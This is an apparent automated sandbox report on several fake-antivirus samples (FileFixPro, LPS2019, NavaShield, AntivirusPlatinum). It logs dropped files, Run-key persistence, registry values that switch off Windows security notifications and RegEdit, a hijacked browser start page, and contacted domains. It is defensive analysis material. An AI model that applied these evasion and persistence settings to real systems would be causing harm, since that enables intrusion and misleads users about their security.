C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp" /SL4 $60150 "C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe" 232353 52224

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 filefixpro.com udp

Files

\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp

\Users\Admin\AppData\Local\Temp\is-PF36L.tmp\_isetup\_shfoldr.dll

\Program Files (x86)\FileFix Professional 2009\wizard.exe

\Program Files (x86)\FileFix Professional 2009\unins000.exe

Analysis: behavioral26

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\HjuTygFcvX C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\__tmp_rar_sfx_access_check_240641656 C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File opened for modification C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 2780

Network

Country Destination Domain Proto

Files

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

Analysis: behavioral29

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaBridge.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaDebugger.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\NavaShield = "c:\\Nava Labs\\Nava Shield\\navashield.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Nava Labs\Nava Shield\NavaShield.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe C:\Nava Labs\Nava Shield\NavaShield.exe
PID 2012 wrote to memory of 436 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaBridge.exe
PID 2012 wrote to memory of 1560 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaDebugger.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaShield.exe

"C:\Nava Labs\Nava Shield\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaBridge.exe

"C:\Nava Labs\Nava Shield\NavaBridge.exe"

C:\Nava Labs\Nava Shield\NavaDebugger.exe

"C:\Nava Labs\Nava Shield\NavaDebugger.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 navashield.com udp
DE 64.190.63.222:80 navashield.com tcp

Files

C:\Nava Labs\Nava Shield\NavaDebugger Libs\MD5.dll

C:\Nava Labs\Nava Shield\NavaDebugger.exe

C:\Nava Labs\Nava Shield\NavaShield Libs\Internet Encodings.dll

C:\Users\Admin\AppData\Local\Temp\$inst\0001.tmp

\Nava Labs\Nava Shield\NavaShield.exe

C:\Nava Labs\Nava Shield\NavaShield.exe

\Nava Labs\Nava Shield\NavaShield Libs\Appearance Pak.dll

\Nava Labs\Nava Shield\NavaMod.dll

C:\Nava Labs\Nava Shield\config.dat

C:\Nava Labs\Nava Shield\NavaBridge.exe

\Nava Labs\Nava Shield\NavaBridge Libs\Browser Plugin.dll

C:\Nava Labs\Nava Shield\bridge.dat

\Nava Labs\Nava Shield\NavaDebugger.exe

C:\Nava Labs\Nava Shield\navig.dat

\Nava Labs\Nava Shield\NavaBridge.exe

Analysis: behavioral9

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

144s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe"

Signatures

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" \??\c:\windows\antivirus-platinum.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_259414483 C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\windows\antivirus-platinum.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE3A-8596-11D1-B16A-00C0F0283628}\ = "Panel Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ = "IImage" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\Control C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.Toolbar.1\CLSID\ = "{612A8624-0FB3-11CE-8747-524153480004}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{612A8626-0FB3-11CE-8747-524153480004}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6B7E6391-850A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E86-DF38-11CF-8E74-00A0C90F26F8}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E8E-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6B7E6392-850A-101B-AFC0-4210102A8DA7}\1.3\FLAGS C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF952-8592-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8A3DC00-8593-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\ = "Microsoft ImageList Control, version 5.0 (SP2)" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA40-E020-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF953-8592-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA52-E020-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DA8D90-9D6A-101B-AFC0-4210102A8DA7}\ = "IImageList10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\Version\ = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{612A8625-0FB3-11CE-8747-524153480004} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F4D83602-895E-11D0-B0A6-000000000000}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE35-8596-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{58DA8D96-9D6A-101B-AFC0-4210102A8DA7}\InprocServer32\ = "c:\\windows\\comctl32.ocx" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\ = "IListItem10" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD0-E01E-11CF-8E74-00A0C90F26F8} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C27CCE38-8596-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E80-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E82-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE5-8583-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA62-E020-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.ListViewCtrl\CurVer C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E6E17E8C-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\MiscStatus C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9ED94444-E5E8-101B-B9B5-444553540000} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6B7E63A3-850A-101B-AFC0-4210102A8DA7}\ = "Panel Property Page Object" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{612A8626-0FB3-11CE-8747-524153480004}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7791BA62-E020-11CF-8E74-00A0C90F26F8}\ = "INode" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352} C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A \??\c:\windows\antivirus-platinum.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2492 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\AntivirusPlatinum.exe C:\WINDOWS\302746537.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2616 wrote to memory of 2416 N/A C:\WINDOWS\302746537.exe C:\Windows\SysWOW64\cmd.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regsvr32.exe
